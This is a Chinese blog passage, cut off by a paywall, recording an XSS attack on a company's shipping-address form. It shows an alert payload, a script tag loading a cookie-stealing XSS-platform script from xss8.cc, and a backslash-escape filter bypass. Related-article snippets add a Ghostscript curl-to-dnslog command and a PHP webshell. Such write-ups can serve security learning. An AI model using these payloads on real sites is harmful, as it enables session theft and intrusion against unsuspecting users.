【渗透实例】记录一次XSS渗透过程

最新推荐文章于 2024-08-17 21:22:41 发布

TeamsSix

最新推荐文章于 2024-08-17 21:22:41 发布

阅读量2.3k

点赞数 2

分类专栏：渗透实例文章标签： XSS

本文链接：https://blog.csdn.net/qq_37683287/article/details/94591810

版权

本文记录了一次XSS渗透过程，首先在目标网站的编辑收货地址处发现XSS漏洞，然后通过构造带转义字符的XSS代码成功绕过平台过滤，实现了与XSS平台的连接。虽然能获取用户Cookie等信息，但由于触发条件限制，实际利用价值有限。作者探讨了漏洞可能的其他利用价值，并欢迎读者分享想法。

摘要由CSDN通过智能技术生成

0x01 找到存在XSS的位置

没什么技巧，见到框就X，功夫不负有心人，在目标网站编辑收货地址处发现了存在XSS的地方，没想到这种大公司还会存在XSS。

使用的XSS代码：<img src=1 onerror=alert(1)
#因为CSDN编辑器的原因，这里括号不能补全，使用该XSS的时候alert(1)后要加上右括号以补全前面的左括号。

在这里插入图片描述

0x02 构造XSS代码连接到XSS平台

XSS平台给我们的XSS代码是这样的：

</tExtArEa>'"><sCRiPt sRC=https://xss8.cc/3Ri4></sCrIpT>

在这里插入图片描述
直接插入的话会提示参数非法，经过多次尝试，最后发现该平台会对双引号、script字符进行识别过滤，大小写会被过滤，于是尝试插入下面的语句:

</tExtArEa>'\"><\sCRiPt sRC=https://xss8.cc/3Ri4></\sCrIpT>

这条代码比上面平台给的XSS代码的多了几个 “\”，也就是转义字

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

TeamsSix

关注关注

2
点赞
踩
7

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

对某小程序的一次渗透记录

布啦啦

03-25

667

最近报了一个驾校，然后在报名回家以后，就开始疯狂的挂科目一的时长，突然想到这个小程序会不会存在漏洞呢，如果发现了，还可以去CNVD（https://www.cnvd.org.cn/）报一下，一是拿个积分，二是间接修复一下漏洞，毕竟自己的所有信息都在这个小程序里，不想自己有一天因为它存在什么漏洞，导致自己的信息被人偷走，所以本着保护自己的原则，我开始了一次【试探】。具体是哪个小程序，这里我就不说啦，漏洞已经报到CNVD了，写本文只是做一个分享。

渗透测试实例指南--XSS

qq_37051023的博客

07-30

224

概要：XSS--跨站脚本攻击，Cross-Site Scripting，属于代码注入攻击的一种，针对网站应用程序的安全漏洞攻击技术。它允许恶意用户将代码注入到网页，其他用户浏览器此页面时会受到影响，一旦攻击成功，则可能获取较高权限、私密网页内容、会话和cookie等内容。 XSS攻击分为三种方式：反射型XSS、存储型XSS、DOM型XSS。反射型：攻击者利用电子邮件或其他方式将包含XSS代码的恶意链接发送给目标用户，目标用户点击或浏览此链接后，会访问到某服务器，服务器接收到请求后，将带有XSS代码的数

参与评论您还未登录，请先登录后发表或查看评论

XSS实验记录

最新发布

qq_58742048的博客

08-17

1774

这里的代码使用get传参的方式，给jeff一个值，将值传给let jeff,变量ma然后执行Ma name +jeff传入的值,setTimeout是延时执行ma,同时ma还带了一个ineerText的属性。因为过滤掉了（），所以script无法使用，这里使用img的报错实现，因为括号被过滤，使用实体编码进行绕过。在定时器里有一个submmit这个提交事件，获取了from表单的id，在两秒钟进行action的自动提交，而这个action是他接受的一个伪协议。或是使用eval函数来进行转写。

XSS例子

技术资料库

10-19

6187

Note from the author: XSS is Cross Site Scripting. If you dont know how XSS (Cross Site Scripting) works, this page probably wont help you. This page is for people who

记录一次常规的渗透测试

我想做一个好人<svg/onload=Alert`1`>(

06-01

428

首先是魔图漏洞 %!PS userdict /setpagedevice undef save legal { null restore } stopped { pop } if { legal } stopped { pop } if restore mark /OutputFile (%pipe%curl http://dnslog.cn/`whomai`) currentdevice putdeviceprops 然后windows下载后门。方法1：certutil.exe -urlca

记录一次模拟渗透

0verWatch的博客

07-25

584

前言今天还模拟了一次真实的挖洞过程，今天这网站一共有三个漏洞（都是要经过提醒才能弄出来），因为是搭的环境，简单记录一下思路，顺便当个回顾，源码啥的都没有了，耍完就要求删掉了。正文这台服务器有个前提就是跟我们一个网段的服务器，并且开了IIS服务，但是前提我们是不知道他的ip的，这个时候我们需要用一下nmap来扫一下同一网段下的ip nmap -sP -PI -PT 192.16...

渗透测试：XSS实验集合

WEL测试

12-22

938

MCIR-XSSMH：challenge0 页面：/mcir/xssmh/challenges/challenge0.php 1、验证是否存在XSS注入：<script>alert(1)</script> 2、存在XSS注入，要求是弹出“Hello World”，调整注入内容：<script>alert("Hello, world!")</script>url如下： http://mcir.pte.com/mcir/xssmh/xss.php?locati

xssbypass_【渗透技巧】XSS三重URL编码绕过实例

weixin_30126409的博客

12-23

4000

0x00 前言跨站脚本攻击(Cross Site Scripting)，缩写为XSS，恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的目的。在黑盒渗透中，XSS在很多网站中普遍存在，这边分享一个简单有意思的XSS三重URL编码绕过漏洞实例。0x01 漏洞实例某次测试中，遇到一个很奇葩的XSS，我们先来加一个双...

XSS漏洞——渗透day08

qq_62716256的博客

09-04

585

XSS漏洞——渗透day08

第04篇：XSS三重URL编码绕过实例1

08-03

这表明服务器端可能在接收参数后，不仅解码了一次URL，还将其直接输出到HTML中。攻击者抓住了这个逻辑错误，通过进行三重URL编码（%252522），成功绕过了服务器的防御，使得双引号被正确解析并闭合了HTML标签，...

XSS攻击实例1

01-11

简单让你了解xss攻击。项目基于Asp.net 框架，VS2010下创建，C#语言

XSS漏洞解决方案实例

08-30

跨网站脚本（Cross-site scripting，通常简称为XSS或跨站脚本或跨站脚本攻击）是一种网站应用程序的安全漏洞攻击，是代码注入的一种。它允许恶意用户将代码注入到网页上，其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。

记录一次渗透测试全过程

weixin_30730151的博客

12-18

609

一、信息收集：　　1、巡风扫漏洞看到一个80端口开放，上去看一看，任意文件上传。　　2、巡风扫漏洞还看到一个phpmyadmin弱口令，版本很老。二、任意文件上传：　　1、上传php文件：　 <?php @system($_GET("cmd")) ?> /* 合理合法过程要接受检查，不然还是传post，默认不记日志上传路径在下载页面可以爆出...

【萌新】记录一次渗透小站的过程

Leep0rt的博客

09-07

1003

一开始接触该站先随便翻阅了一些目录发现在URL中 “/ProductView.asp?ID=1021 ” 这几个字段格外引人瞩目于是二话不说看看有没有注入点输入一个 ' 看一看发现报错了！！！然后惯例 and 1=1, and 1=11 发现存在云锁突然想起来云锁存在一个绕过的漏洞具体什么的百度一下看看吧！云锁s

记录一次渗透的思路

派大李的博客

11-26

303

信息收集就略过了。。。尝试弱口令成功进入后台。。弱口令简直就是 0day啊！！！后台界面。。进到后台就要getshell，找到上传点，burp改包成功上传冰蝎拼接url地址访问成功连接，环境是phpstudy搭建的，windows2012的服务器系统函数都被禁用，执行不了命令，突破： phpstudy搭建的环境权限都很大，可以跨目录，直接修改php.ini配置文件成功执行命令：whoami 是个管理员权限，接下来就是重头戏了，本人在这里翻车了。。。提权试了许多方法，奈何我太

记录第一次web渗透测试篇

m0_47421272的博客

01-07

2937

** 刚学web渗透2个月第一次实战。 ** 渗透利用的工具: 1.dirb 2.nmap 开始朋友发给我一个链接，点进去看是一个后台尝试弱口令登录.(user:admin pass:admin) 非常幸运，登录进了后台。找上传点上传webshell。这里上传没有格式限制。上传webshell。可以上传成功。右键复制链接地址。使用weevely连接。发现后缀没显示，应该过滤掉了，本人比较懒，webshell上传失败了。那就使用dirb扫描该站点目录，看看有没有敏感目录。

记一次xss挑战

weixin_33862514的博客

01-22

129

2019独角兽企业重金招聘Python工程师标准>>> ...

记一次XSS攻击绕过

zkaqlaoniao的博客

10-27

540

最近一直在看国外的赏金平台，绕waf是真的难受, 记录一下绕过的场景。

"Web安全服务渗透测试报告模板与实例说明

Web安全服务渗透测试报告是对一个门户网站进行渗透测试后的全面分析报告，旨在评估该网站的安全性能并提供相应的改进建议。本报告使用了模板.docx，并按照通用的渗透测试报告结构进行撰写。摘要部分对整个报告进行...